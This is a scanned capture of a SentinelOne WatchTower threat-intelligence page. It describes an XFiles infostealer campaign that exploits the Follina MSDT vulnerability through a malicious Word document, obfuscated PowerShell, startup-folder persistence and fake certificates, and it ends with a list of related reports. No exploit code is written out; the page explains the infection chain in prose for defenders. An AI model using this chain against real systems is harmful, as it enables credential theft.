assets.sentinelone.com
Open in
urlscan Pro
52.203.30.16
Public Scan
Submitted URL: https://customer-success-links.totango.co/ss/c/iXmfWo-LE_wkLRkK4Wv5P1pl7_AP3Pc9zyyM5ViJWx_Pw4bghDn4JTsq_0qGpqPwrF1ynGgyOFoncIf35qPbjS-Hgjl...
Effective URL: https://assets.sentinelone.com/customer-watchtower-white/xfiles-infostealer-follina-wt
Submission: On August 23 via manual from IN — Scanned from DE
Effective URL: https://assets.sentinelone.com/customer-watchtower-white/xfiles-infostealer-follina-wt
Submission: On August 23 via manual from IN — Scanned from DE
Form analysis 2 forms found in the DOM
<form id="mktoForm_3371" style="display: none; font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); width: 1px;" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 155px;">
<div class="mktoAsterix">*</div><span style="font-size: 14px;">Email:</span>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email" class="mktoField mktoEmailField mktoHasWidth mktoRequired"
aria-required="true" style="width: 185px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Source__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="pathfactory" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="website" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Campaign__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Term__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Content__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap"><label for="contentListThresholdMet" id="LblcontentListThresholdMet" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Content List Threshold Met:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><textarea id="contentListThresholdMet" name="contentListThresholdMet" rows="2" aria-labelledby="LblcontentListThresholdMet InstructcontentListThresholdMet"
class="mktoField mktoHasWidth" maxlength="2000" style="width: 150px;"></textarea><span id="InstructcontentListThresholdMet" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap"><label for="GCLID__c" id="LblGCLID__c" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>GCLID:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><textarea id="GCLID__c" name="GCLID__c" rows="2" aria-labelledby="LblGCLID__c InstructGCLID__c" class="mktoField mktoHasWidth" maxlength="2000"
style="width: 150px;"></textarea><span id="InstructGCLID__c" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="3371"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="327-MNM-087">
</form><form style="display: none; font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft">
</form>Text Content
* Email: * Content List Threshold Met: * GCLID: Submit Thumbnails Document Outline Attachments Previous Next Highlight all Match case Whole words Presentation Mode Open Print Download Current View Go to First Page Go to Last Page Rotate Clockwise Rotate Counterclockwise Text Selection Tool Hand Tool Vertical Scrolling Horizontal Scrolling Wrapped Scrolling No Spreads Odd Spreads Even Spreads Document Properties… Toggle Sidebar Find Previous Next of 4 Presentation Mode Open Print Download Current View Tools Zoom Out Zoom In Automatic Zoom Actual Size Page Fit Page Width 50% 75% 100% 125% 150% 200% 300% 400% XFiles InfoStealer Campaign Exploits FollinaDocument Type: WatchTower Flash ReportTLP:AmberDate of Publication:13 July 2022Cyber Risk Rating:ElevatedDate of Research:13 July 2022Threat Actors / Malware Families Referenced:XFilesInfostealer, Follina, CVE-2022-30190Key Takeaways:●WatchTower analysts are actively monitoring an XFiles infostealer campaign actively exploitingCVE-2022-30190 (aka Follina), a vulnerability in the Microsoft Support Diagnostic Tool (MSDT).●XFiles is an infostealer that has been active since 2021 and primarily steals sensitive browser informationlike history, cookies, passwords and credit card information. It also targets credentials for FTP,cryptocurrency wallets, Telegram channels, and Discord accounts.●XFiles operates primarily through Telegram channels and offers multiple subscription plans for its buyers.The developers of XFiles have also added a miner module to the infostealer, expanding its capabilities.●Readers can access our previous coverage on attackers leveraging Follinahereandhere.Technical Details:In the campaign we observed, the attacker uses a malicious Microsoft Word document designed to exploit theFollina vulnerability and download XFiles into the victim’s system. This Word file has a malicious link, embeddedinto the document’s “external relationships” OLE object, as depicted in the image below. This link points to aweaponized HTML file in an attacker-controlled infrastructure. When a victim previews or opens this maliciousdocument, this initiates the infection chain.1 Malicious Link Embedded Into Follina Document’s External Reference Entity.The image below shows the contents of the downloaded HTML file. The portion of the code which attempts toexploit the MSDT vulnerability is highlighted below.Follina Exploit Code In Downloaded HTML File.The obfuscated PowerShell content in the HTML file is then decoded. The file downloads and executes asecondary payload from the attacker’s C2 infrastructure into the Windows startup folder to maintain persistence.Fig: PowerShell Deobfuscated Content That Adds Persistence.The secondary payload (namedChimLacUpdate.exeinthe campaign we observed), is a shellcode thatdownloads and executes the final XFiles payload from the C2 infrastructure. TheChimLacUpdate.exebinaryisunsigned. An examination of the signature metadata claims that the file is signed by Bkav Corporation, aVietnamese security antivirus company. Thus, we can conclude that XFiles’ developers are using fake Bkavcertificates to deceive their victims.2 More Information Less Information Close Enter the password to open this PDF file. Cancel OK File name: - File size: - Title: - Author: - Subject: - Keywords: - Creation Date: - Modification Date: - Creator: - PDF Producer: - PDF Version: - Page Count: - Page Size: - Fast Web View: - Close Preparing document for printing… 0% Cancel Next Next WatchTower Flash Report | Lilith Ransomware WatchTower hunters have identified a new ransomware family (known as Lilith because of the file extension it adds to encrypted files) through proactive threat hunting on VirusTotal. LinkedIn LinkLinkedIn LinkTwitter LinkTwitter LinkFacebook LinkFacebook LinkEmail Link Get a Demo SIGN UP FOR A DEMO WatchTower Flash Report | DogWalk - Microsoft (MSDT) Remote Code Execution Vulnerabilitypdf WatchTower Flash Report | Threat Actor Uses FIFA 2022 Naming Conventionspdf WatchTower Flash Report | Mars Stealer Fakes Atomic Wallet Domainpdf WatchTower Flash Report | Prynt Stealer Increased Activitypdf WatchTower Flash Report | BlackCat (ALPHV) Ransomware Active early Augustpdf WatchTower Flash Report | Phobos Ransomware Activity Spotted mid-Augustpdf WatchTower Flash Report | Manjusaka: A Chinese Variant of Cobalt Strikepdf WatchTower Flash Report | Gwisin Ransomware Targets Windows and Linuxpdf WatchTower Flash Report | SocGholish Activities Spotted mid-Augustpdf WatchTower | August 2022 TLP: AMBER | Intelligence-Driven Threat Huntingpdf WatchTower Flash Report | Ousaban: Banker Trojan Abuses Cloud Servicespdf WatchTower Flash Report | Active Ransomware July 2022pdf AgentTesla Infostealer Malware Remains Activepdf WatchTower Flash Report | ChromeLoader: Beyond Simple Malicious Adspdf WatchTower Flash Report | VSingle Uses GitHub to Obtain C2 Infopdf WatchTower Flash Report | Socgholish Updatepdf WatchTower Flash Report | REvil Ransomware Group Activity Escalatespdf WatchTower Flash Reports | Mekotio Continues Operationspdf WatchTower Flash Report | LokiBot Malware Continues to Evolvepdf WatchTower Flash Report | Vidar Stealer Adds More Dependency DLLspdf WatchTower Flash Report | Fake SalesForce Campaignpdf WatchTower Threat Report | NK Threat Actor uses H0lyGh0st ransomwarepdf WatchTower Flash Report | Netwire RAT Spreads Through Ace Archivespdf WatchTower Flash Report | SmokeLoader Distributed Amadey Botpdf WatchTower Flash Report | DCRat aka DarkCrystal Ratpdf WatchTower Flash Report | Common C2 Domain Used by Multiple Infostealerspdf WatchTower Flash Report | BlueSky Ransomwarepdf WatchTower Flash Report | XFiles InfoStealer Campaign Exploits Follinapdf WatchTower Flash Report | Lilith Ransomwarepdf WatchTower Flash Report | Youtube Used to Spread Malwarepdf WatchTower Flash Report | Brute Ratel C4 Abusepdf WatchTower Flash Report | NoCry Ransomware Tech Analysispdf WatchTower Flash Report | New TTP for Qakbotpdf WatchTower | July 2022 TLP: AMBER | Intelligence-Driven Threat Huntingpdf WatchTower Flash Report | RedAlert Infects VMWare ESxi Serverspdf WatchTower Flash Report | ZuoRAT Target Small and Home Officespdf WatchTower Flash Report | MSI Installer - Magniber Ransomwarepdf WatchTower Flash Report | Follina Campaign Abusing Discord CDNpdf WatchTower Flash Report | HavanaCrypt Poses As Google Software Updatepdf WatchTower Flash Report | Cuba Ransomware pdf WatchTower Flash Report | Raccoon Stealer Version 2.0pdf WatchTower Flash Report | GootLoader Infects With JavaScript Lurespdf WatchTower Flash Report | Maui Ransomware Targets Healthcare Sectorpdf WatchTower Flash Report | Malware Targets Uyghur Communitypdf WatchTower Flash Report | SocGholish Still Alivepdf WatchTower Flash Report | Lockbit 3.0 Ransomware Bug Bountypdf WatchTower Flash Report | Cryptxxx Ransomware Blockedpdf WatchTower Flash Report | CredStealer Abuses Follina Vulnerabilitypdf WatchTower Flash Report | DeadBolt Ransomwarepdf WatchTower Flash Report | SVCReady Loader Hides ShellCodepdf WatchTower Flash Report | HelloXD Ransomwarepdf WatchTower Flash Report | LuminousMoth Targets Global Organizationpdf WatchTower Flash Report | Stolen Email Campaign Drops Qakbotpdf WatchTower Flash Report | Spam Email Campaign Drops BitRatpdf WatchTower Flash Report | MedusaLocker Ransomwarepdf WatchTower Flash Report | Miners and Cerber Abusing Confluence Vulnerabilitypdf WatchTower Flash Report | BlackBasta Ransomwarepdf WatchTower Flash Report | GoodWill Ransomwarepdf WatchTower Flash Report | Hazard Token Grabberpdf WatchTower Flash Report | Molerats Continues Targeting Palestinepdf WatchTower Flash Report | Confluence RCE Vulnerabilitypdf WatchTower Flash Report | SunCrypt Ransomwarepdf WatchTower Flash Report | Pay2Decrypt Ransomwarepdf WatchTower | June 2022 TLP: AMBER | Intelligence-Driven Threat Huntingpdf WatchTower Flash Report | Follina Malicious Word Campaignpdf WatchTower Flash Report | NetWire RATpdf WatchTower Flash Report | Fake CVE-2022-26809pdf WatchTower Flash Report | Agrat Stealerpdf WatchTower Flash Report | Py Programmed KurayStealerpdf WatchTower Flash Report | LockBit Black Ransomwarepdf WatchTower Flash Report | Shlayer Flashpdf WatchTower Flash Report | Tsunami Bot Campaign Drops PwnRigpdf WatchTower Flash Report | Phobos Ransomwarepdf WatchTower Flash Report | Red Delta APT Actively Targeting Vietnampdf WatchTower Flash Report | WordPress Tatsu Builder Plugin Targetedpdf WatchTower Flash Report | Possible Threats To FIFA 2022pdf WatchTower Flash Report | BrightBlack Ransomwarepdf WatchTower Flash Report | Cheers Ransomwarepdf WatchTower Flash Report | Xor.DDos pdf WatchTower Flash Report | Qakbot Threat Hunting Reportpdf WatchTower Flash Report | RansomHouse Threat Actorspdf WatchTower Flash Report | APT35 Continues to Exploit Log4jpdf WatchTower Flash Report | Gootloader 2022 Campaignpdf WatchTower Flash Report | ZareuS - New Lock Down Ransomware Variantpdf WatchTower Flash Report | Solarmarker Recent Campaignpdf WatchTower Flash Report | New .Net Compiled Eternity Ransomwarepdf WatchTower Flash Report | Mekotio Banker Trojanpdf WatchTower Flash Report | Ngrok Reverse Proxy Toolpdf WatchTower Flash Report | Choziosi Loaderpdf WatchTower Flash Report | PyMafkapdf WatchTower Flash Report | Emerging Infostealer: PennyStealer v1.3.3pdf WatchTower Flash Report | BumbleBee Malwarepdf WatchTower Flash Report | Vulcan Ransomware Group Recruitingpdf WatchTower Flash Report | Yashma Ransomware Builder v1.2 Leakedpdf WatchTower Flash Report | Nerbian Ratpdf WatchTower Flash Report | oRAT Malwarepdf WatchTower Flash Report | Mindware Ransomware - Possible Rebrandpdf WatchTower Flash Report | LazyScript APTpdf WatchTower Flash Report | Lazarus Cont. Target MacOSpdf WatchTower Flash Report | Hive Ransomware Group Suffers Breachpdf WatchTower Flash Report | Ginzo Stealerpdf WatchTower | May 2022 TLP: AMBER | Intelligence-Driven Threat Huntingpdf WatchTower Flash Report | Chaos Code Reused - Yashma and ONYXpdf WatchTower Flash Report | North Korean Lazarus APT TradeTraitorpdf WatchTower Flash Report | CVE-2022-22954 VMware Vulnerabilitypdf WatchTower Flash Report | SiMay Ratpdf WatchTower Flash Report | Prynt InfoStealer - 2pdf WatchTower Flash Report | Molerat Targeting Menapdf WatchTower Flash Report | Conti Intrusion Behavioral TTPspdf WatchTower Flash Report | BlackGuard Stealerpdf WatchTower Flash Report | Lock Bit Active April 2022pdf WatchTower Flash Report | Yashama Ransomware Chaospdf WatchTower Flash Report | MuddyWater APT TTPspdf WatchTower Flash Report | Lokibot Active April 2022pdf WatchTower Flash Report | Mars Infostealerpdf WatchTower Flash Report | Nb65 Ransomware Thank Contipdf WatchTower Flash Report | Socgholish Campaign Activepdf WatchTower Flash Report | SolarMarker Activepdf WatchTower Flash Report | Vidar Infostealerpdf WatchTower Flash Report | JSSLoaderpdf WatchTower Flash Report | Ursnifpdf WatchTower | April 2022 TLP: AMBER | Intelligence-Driven Threat Huntingpdf WatchTower Flash Report | Muddy Water In March 2022pdf WatchTower Flash Report | Hunting For Commodity Malware Via Network Patternspdf WatchTower Flash Report | UAC0056pdf WatchTower Flash Report | Gimmick Malware For Mac OSpdf WatchTower Flash Report | SystemBC Ratpdf WatchTower Flash Report | Raccoon Shutdownpdf WathTower Flash | New Ransomware Developed By N3xViruzpdf WatchTower Flash Report | Hive Ransomwarepdf WatchTower Flash Report | Lock Bit Active In March 2022pdf WatchTower Flash Report | Russia Ukraine Cyberwarpdf WatchTower Flash Report | Go Google Ransomwarepdf WatchTower Flash | PlugX Using Eastern European Lure Themepdf WatchTower Flash | Hermetic Wiper: Cyber Attacks Surge as Russia Invades Ukrainepdf WatchTower Flash | njRat Abuses One Drivepdf WatchTower | March 2022 TLP: WHITE | Intelligence-Driven Threat Huntingpdf Qakbot Abusing One Drivepdf WatchTower Flash | Log4j Vulnerability Still Abused In The Wild - TLP:Whitepdf WatchTower Flash | Updates to BlackCat Data Exfiltration Tool Suggest BlackMatter/DarkSide Rebrandpdf WatchTower | Year End Edition Dec 21/Jan 22 TLP: WHITE | Intelligence-Driven Threat Huntingpdf WatchTower Flash | Magniber Activity Risespdf WatchTower Flash | Log4j Targeting VMware Horizonpdf WatchTower | November 2021 TLP: WHITE | Intelligence-Driven Threat Huntingpdf WatchTower Flash | RedLine Stealerpdf WatchTower Flash | Log4J pdf WatchTower Flash | Dridex From Log4j Infectionpdf SentinelOne WatchTower Datasheetpdf